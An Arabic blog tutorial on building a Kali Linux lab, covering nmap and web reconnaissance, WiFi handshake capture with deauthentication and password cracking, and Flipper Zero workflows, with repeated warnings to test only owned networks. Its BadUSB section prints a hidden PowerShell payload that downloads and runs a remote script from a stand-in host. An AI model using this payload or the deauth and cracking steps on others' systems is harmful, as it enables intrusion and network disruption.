القائمة
الرئيسية مقالات {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} نبذة عني اعمل معي
Linux terminal with code
أمان مارس 7, 2026 • 25 دقائق للقراءة

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

شارك:
Lee Foropoulos

Lee Foropoulos

25 دقائق للقراءة

Continue where you left off?
Text size:

Contents

مسار الهاكر: سلسلة من 5 أجزاء

الجزء 1: مقدمةالجزء 2: إتقان Flipperالجزء 3: أساسيات Kaliالجزء 4: الاستغلالالجزء 5: التدقيق الكامل

في الجزأين 1 و2، قمت بنسخ البطاقات وتحليل الترددات اللاسلكية وفهمت لماذا معظم "الأمان" مجرد مسرحية. رأيت الثغرات من الخارج. الآن تدخل إلى الداخل وتراها من منظور المهاجم.

Kali Linux هو توزيعة اختبار الاختراق المعيارية في الصناعة. يأتي محملاً مسبقاً بأكثر من 600 أداة أمنية. قد يبدو هذا مربكاً. معظم الدروس تلقيك في العمق بأوامر لا تفهمها وبدون سياق لماذا هي مهمة.

نحن نفعل هذا بشكل مختلف. بنهاية هذا المقال، سيكون لديك مختبر عامل، وستفهم استطلاع الشبكات على المستوى الأساسي، وستلتقط مصافحة WiFi الخاصة بك. كل خطوة تُبنى على السابقة.

معظم الدروس تلقيك في العمق بأوامر لا تفهمها وبدون سياق لماذا هي مهمة. كل خطوة هنا تُبنى على السابقة.

الجزء 1: بناء مختبرك

مختبرو الاختراق المحترفون لا يشغلون Kali على جهازهم الرئيسي. يستخدمون بيئات معزولة يمكن إعادة تعيينها وأخذ لقطات لها وتدميرها دون التأثير على النظام الأساسي. ستفعل الشيء نفسه.

الخيار أ: الآلة الافتراضية (موصى بها للتعلم)

الآلة الافتراضية تمنحك أكثر بيئة تعلم أماناً. يمكنك حفظ لقطات لتقدمك وارتكاب الأخطاء والعودة فوراً.

ما ستحتاجه

  • الجهاز المضيف: 16GB أو أكثر من الذاكرة، 50GB أو أكثر مساحة قرص فارغة، معالج حديث يدعم الافتراضية
  • برنامج الافتراضية: VirtualBox (مجاني) أو VMware Workstation Player (مجاني للاستخدام الشخصي)
  • Kali Linux: صورة VM رسمية جاهزة من kali.org

مشروع: إعداد Kali VM

الوقت: 30-45 دقيقة

الخطوات:

  1. حمّل صورة Kali VM لمشغل الافتراضية الخاص بك (VirtualBox أو VMware)
  2. استخرج الأرشيف المحمّل (يُنصح بـ 7-Zip لنظام Windows)
  3. استورد الآلة الافتراضية في مشغل الافتراضية
  4. اضبط الموارد: 4GB ذاكرة كحد أدنى (يُنصح بـ 8GB)، نواتي معالج أو أكثر
  5. فعّل محول الشبكة في وضع "Bridged" للوصول الكامل للشبكة
  6. شغّل الآلة الافتراضية وسجل الدخول ببيانات الاعتماد الافتراضية: kali / kali
  7. افتح الطرفية ونفّذ: sudo apt update && sudo apt full-upgrade -y
  8. أنشئ لقطة باسم "Fresh Install" للاسترداد السهل

التحقق من النجاح: يمكنك فتح الطرفية وتشغيل whoami ورؤية kali.

الخيار ب: أجهزة مخصصة (للتمرين الجاد)

عندما تصبح مرتاحاً مع Kali، الأجهزة المخصصة تزيل عبء الآلة الافتراضية وتتيح الوصول الكامل للعتاد، وهو أمر ضروري لاختبار الشبكات اللاسلكية.

توصيات الأجهزة

الخيار الاقتصاديThinkPad X230/T430 مستعمل ($100-150)، WiFi Intel مستبدل بـ Atheros AR9285
الخيار الحديثFramework Laptop مع وحدة WiFi متوافقة مع Linux
مستشعر مخصصRaspberry Pi 5 بسعة 4GB مع محول خارجي Alfa AWUS036ACH

حالياً، الآلة الافتراضية مثالية. الأجهزة المخصصة تصبح مهمة عندما تحتاج وضع المراقبة لاختبار الشبكات اللاسلكية (سنتناول ذلك لاحقاً في هذا المقال).

الخيار ج: Live USB (بدون حفظ)

Live USB يشغل Kali مباشرة بدون تثبيت. كل شيء يختفي عند إيقاف التشغيل. مفيد للاختبار على أجهزة مختلفة، لكنك ستفقد عملك كل جلسة ما لم تنشئ قسماً دائماً.

bash
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

أمر dd يدمر البيانات

أمر dd يكتب مباشرة على القرص بدون تأكيد. تحقق ثلاث مرات من اسم الجهاز. الكتابة على الجهاز الخاطئ ستمحو ذلك القرص بالكامل.

Kali Linux terminal with security tools running
بيئة Kali Linux المُعدّة بشكل صحيح هي أساس كل اختبار اختراق احترافي.

الجزء 2: عقلية الطرفية

قبل لمس أدوات الأمان، تحتاج أن تكون مرتاحاً في الطرفية. هذا ليس اختيارياً. واجهة المستخدم الرسومية موجودة في Kali، لكن العمل الحقيقي يحدث في سطر الأوامر.

التنقل الأساسي

bash
1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

تصعيد الصلاحيات

العديد من أدوات الأمان تتطلب صلاحيات root. في Kali، sudo يمنحك صلاحيات root مؤقتة.

bash
1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

Root بمسؤولية

التشغيل كـ root يعني عدم وجود شبكة أمان. خطأ مطبعي مثل rm -rf / سيدمر كل شيء. Kali الحديث يمنع هذا الأمر تحديداً، لكن المبدأ يبقى: افهم ما تشغله قبل أن تشغله.

إدارة العمليات

bash
1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

أوامر الشبكة

bash
1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

مشروع: التعرف على الطرفية

الوقت: 15 دقيقة

المهام:

  1. اعثر على عنوان IP الخاص بك على الشبكة المحلية باستخدام ip a
  2. حدد البوابة الافتراضية باستخدام ip route
  3. نفّذ ping للبوابة لتأكيد الاتصال
  4. اعرض جميع الملفات في /etc مرتبة حسب وقت التعديل: ls -lt /etc | head
  5. اقرأ أول 50 سطراً من /etc/passwd: head -n 50 /etc/passwd

الهدف: يجب أن تكون قادراً على التنقل والتحقق من حالة الشبكة وقراءة الملفات بدون تفكير.

الجزء 3: استطلاع الشبكة باستخدام Nmap

Nmap (مخطط الشبكة) هو أهم أداة ستتعلمها. يكتشف المضيفين، ويحدد الخدمات، ويكشف أنظمة التشغيل، ويرسم خريطة طوبولوجيا الشبكة. كل شيء آخر يُبنى على مخرجات nmap.

مسحك الأول

لنمسح شبكتك الخاصة. أولاً، حدد نطاق شبكتك:

bash
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255
bash
1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

سترى مخرجات مثل:

text
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

هذا المسح الأول يخبرك: "هذه الأجهزة موجودة على شبكتي." الآن لنطرح أسئلة أعمق.

اكتشاف الخدمات

بمجرد معرفة المضيفين الموجودين، تريد معرفة الخدمات التي يشغلونها.

bash
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

مخرجات شائعة:

text
1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

كشف نظام التشغيل

bash
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

فهم حالات المنافذ

يُبلغ Nmap عن المنافذ في عدة حالات:

  • open - تطبيق يقبل الاتصالات بنشاط. هذا ما يبحث عنه المهاجمون.
  • closed - المنفذ يمكن الوصول إليه لكن لا يوجد تطبيق يستمع. المضيف نشط لكن لا يوجد شيء هناك.
  • filtered - جدار ناري أو مرشح يحجب الفحص. لا يمكن تحديد إن كان مفتوحاً أم مغلقاً.
  • unfiltered - المنفذ يمكن الوصول إليه لكن nmap لا يستطيع تحديد إن كان مفتوحاً أم مغلقاً.

أنواع المسح والتخفي

bash
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

محرك البرمجة النصية لـ Nmap (NSE)

NSE يوسع nmap بنصوص متخصصة لاكتشاف الثغرات وتعداد الخدمات والمزيد.

bash
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

مشروع: ارسم خريطة شبكتك

الوقت: 30 دقيقة

المتطلبات المسبقة: معرفة نطاق شبكتك من ip a

  1. اكتشف جميع المضيفين: sudo nmap -sn YOUR_NETWORK/24
  2. اكتب قائمة بالمضيفين المكتشفين وعناوين MAC الخاصة بهم
  3. اختر الراوتر (عادة .1) ونفّذ: sudo nmap -sV -sC YOUR_ROUTER
  4. حدد جميع المنافذ المفتوحة والخدمات على الراوتر
  5. نفّذ sudo nmap -A YOUR_COMPUTER لترى ما يكشفه جهازك

وثّق: أنشئ ملفاً نصياً يسرد كل جهاز وعنوان IP وMAC والخدمات. هذه خريطة شبكتك.

امسح فقط الشبكات التي تملكها

مسح الشبكات بدون تصريح غير قانوني في معظم الولايات القضائية. حتى مسح nmap بسيط قد يُعتبر وصولاً غير مصرح به. ابقَ على شبكتك وأجهزتك والشبكات التي لديك إذن كتابي صريح فيها.

الجزء 4: استطلاع الويب

مسح nmap الخاص بك على الأرجح وجد خدمات HTTP (المنافذ 80، 443، 8080). لنفهم ما يعمل هناك.

Whatweb: تعريف سريع للخدمة

bash
# Identify web technologies
whatweb http://192.168.1.1

مثال على المخرجات:

text
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: ماسح ثغرات الويب

bash
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

تعداد المجلدات: ما المخفي؟

خوادم الويب غالباً لديها مجلدات غير مرتبطة من الصفحة الرئيسية: لوحات إدارة، ملفات إعدادات، ملفات نسخ احتياطي.

bash
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

اكتشافات شائعة:

text
1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

موقع قوائم الكلمات

Kali يتضمن قوائم كلمات واسعة في /usr/share/wordlists/. المجلدات الأكثر شيوعاً: dirb/، dirbuster/، rockyou.txt (كلمات مرور)، وseclists/ (مجموعة شاملة).

مشروع: تدقيق واجهة الويب للراوتر

الوقت: 20 دقيقة

  1. نفّذ whatweb http://YOUR_ROUTER_IP لتحديد الخادم
  2. نفّذ nikto -h http://YOUR_ROUTER_IP للتحقق من الثغرات
  3. نفّذ gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. زر المجلدات المكتشفة في المتصفح
  5. سجّل أي لوحات إدارة أو أرقام إصدارات أو اكتشافات مثيرة للاهتمام

اكتشاف شائع: صفحات إدارة الراوتر مكشوفة ببيانات اعتماد افتراضية.

Server room with network infrastructure
استطلاع الشبكة يكشف الطوبولوجيا الكاملة للبيئة المستهدفة، من الراوترات إلى الخدمات المخفية.

الجزء 5: الاستطلاع اللاسلكي

هنا تصبح الأمور مثيرة. شبكات WiFi تبث باستمرار، وبالأدوات الصحيحة، يمكنك التقاط مصافحات المصادقة: التبادل المشفر الذي يحدث عند اتصال جهاز.

متطلبات العتاد

WiFi المدمج لديك على الأرجح لن يعمل لهذا. تحتاج محولاً يدعم وضع المراقبة وحقن الحزم. يُنصح بـ: Alfa AWUS036ACH (حوالي $50) أو Alfa AWUS036ACM (حوالي $45). تعمل مباشرة مع Kali.

فهم وضع المراقبة

وضع WiFi العادي ("managed mode") يستقبل فقط الحزم الموجهة لجهازك. وضع المراقبة يلتقط جميع الحزم في النطاق، حركة مرور كل جهاز على القناة.

bash
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

مسح الشبكات

bash
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

ما تراه هو كل شبكة WiFi في النطاق، إعدادات أمانها، وغالباً الأجهزة المتصلة بها. هذا ما يراه war driver عند مسح الأحياء.

التقاط المصافحة

عندما يتصل جهاز بشبكة WPA2، تحدث مصافحة رباعية. إذا التقطت هذه المصافحة، يمكنك محاولة كسر كلمة المرور دون اتصال.

bash
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

عند التقاط المصافحة، يعرض airodump-ng [ WPA handshake: XX:XX:XX:XX:XX:XX ] في الزاوية العلوية اليمنى.

هجمات Deauth غير قانونية

إرسال حزم إلغاء المصادقة لشبكات لا تملكها جريمة فيدرالية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (في الولايات المتحدة) وقوانين مماثلة في أماكن أخرى. اختبر فقط على شبكتك. الهدف هو فهم الثغرة، وليس مهاجمة الآخرين.

كسر المصافحة

بمصافحة ملتقطة، يمكنك محاولة كسر كلمة المرور دون اتصال باستخدام قائمة كلمات:

bash
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
كلمة مرور حقيقية من اختراقات بيانات فعلية مضمنة في rockyou.txt، قائمة الكلمات الافتراضية المستخدمة لكسر مصافحات WiFi الملتقطة.

فحص واقعية قوة كلمات المرور

rockyou.txt يحتوي على أكثر من 14 مليون كلمة مرور من اختراقات بيانات حقيقية. إذا كانت كلمة مرور WiFi الخاصة بك "password123" أو "summer2024" أو اسم كلبك، يمكن كسرها في ثوانٍ. كلمة مرور عشوائية من 12 حرفاً أو أكثر ستحتاج ملايين السنين لكسرها بالقوة الغاشمة.

مشروع: اختبر أمان WiFi الخاص بك

الوقت: 45 دقيقة

المتطلبات المسبقة: محول WiFi خارجي يدعم وضع المراقبة

  1. فعّل وضع المراقبة: sudo airmon-ng start wlan0
  2. امسح الشبكات: sudo airodump-ng wlan0mon
  3. سجّل القناة وBSSID لشبكتك
  4. التقط على قناتك: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. أعد توصيل جهاز بشبكة WiFi (أو استخدم deauth على شبكتك فقط)
  6. أكّد التقاط المصافحة
  7. اختبر ضد rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

النتيجة: إذا وُجدت كلمة مرورك، غيّرها فوراً إلى شيء عشوائي وطويل (20 حرفاً أو أكثر).

الجزء 6: توصيل Flipper Zero الخاص بك

تتذكر كل تلك الالتقاطات من الجزء 2؟ لندمجها في سير عملك مع Kali.

نقل الملفات

bash
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

تحليل تفريغات NFC

bash
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

تحليل Sub-GHz

bash
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

تطوير BadUSB

أنشئ حمولات BadUSB في Kali، اختبرها على Flipper:

bash
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

حمولات BadUSB قوية

هذه النصوص البرمجية تُنفذ تلقائياً عند التوصيل. حمولة خبيثة يمكنها تثبيت أبواب خلفية أو سرقة بيانات الاعتماد أو تدمير البيانات في ثوانٍ. استخدم فقط على أجهزتك للاختبار. لا تترك Flipper أبداً في مكان قد يوصله شخص آخر.

الجزء 7: التوثيق وسير العمل

مختبرو الاختراق المحترفون لا يشغلون الأدوات فحسب. يوثقون كل شيء. التوثيق الجيد يفصل الهواة عن المحترفين.

تدوين الملاحظات بـ CherryTree

bash
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

حفظ مخرجات Nmap

bash
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

تسجيل الجلسة

bash
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

مسار الهاكر

سلسلة من 5 أجزاء تنقلك من الفضول إلى الكفاءة.

الجزء 1: مقدمة الجزء 2: إتقان Flipper الجزء 3: أساسيات Kali ✓ الجزء 4: الاستغلال الجزء 5: التدقيق الكامل

قائمة تحقق الجزء 3

☐ إعداد المختبر: Kali VM يعمل، محدّث، لقطة محفوظة

☐ الطرفية: مرتاح مع التنقل والصلاحيات والتحكم بالعمليات

☐ Nmap: الشبكة مُرسّمة، الخدمات محددة، الراوتر ممسوح

☐ استطلاع الويب: واجهة ويب الراوتر تم تحليلها بـ whatweb/nikto

☐ اللاسلكي: وضع المراقبة مُفعّل، الشبكات ممسوحة

☐ المصافحة: مصافحة WiFi الخاصة ملتقطة ومختبرة

☐ Flipper: الملفات منقولة، سير العمل مفهوم

☐ التوثيق: الملاحظات منظمة، عمليات المسح محفوظة

خطة عمل أساسيات Kali 0/6

ما التالي

لقد بنيت مختبرك وتعلمت مرحلة الاستطلاع. يمكنك اكتشاف المضيفين وتحديد الخدمات والتقاط المصافحات اللاسلكية. تفهم ما يراه المهاجمون عند النظر إلى شبكة.

في الجزء 4، ننتقل من الاستطلاع إلى الاستغلال. ستتعلم:

  • Metasploit Framework، السكين السويسري للاستغلال
  • سير عمل استغلال الثغرات الشائعة
  • تقنيات ما بعد الاستغلال: ما يحدث بعد الوصول الأولي
  • تصعيد الصلاحيات: من مستخدم عادي إلى مسؤول
  • التمحور: استخدام نظام مخترق لمهاجمة آخرين

الاستطلاع يخبرك أين الأبواب. الاستغلال يعلمك كيف تمر من خلالها.

لقد رسمت خريطة المنطقة. الآن تتعلم التنقل فيها. الجزء 4 ينقلك من مراقب إلى مُشغّل.

نراكم في الجزء 4.

How was this article?

شارك

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

La tufawwit ay maqal

Ihsal ala isharat inda nashr maqalat jadida. La yulzam barid iliktiruni.

Satara laafita fil mawqi inda wujud maqal jadid, wa ishaar min almutasaffih idha samahta.

Isharat almutasaffih faqat. Bidun rasail muzaaja.

0 / 0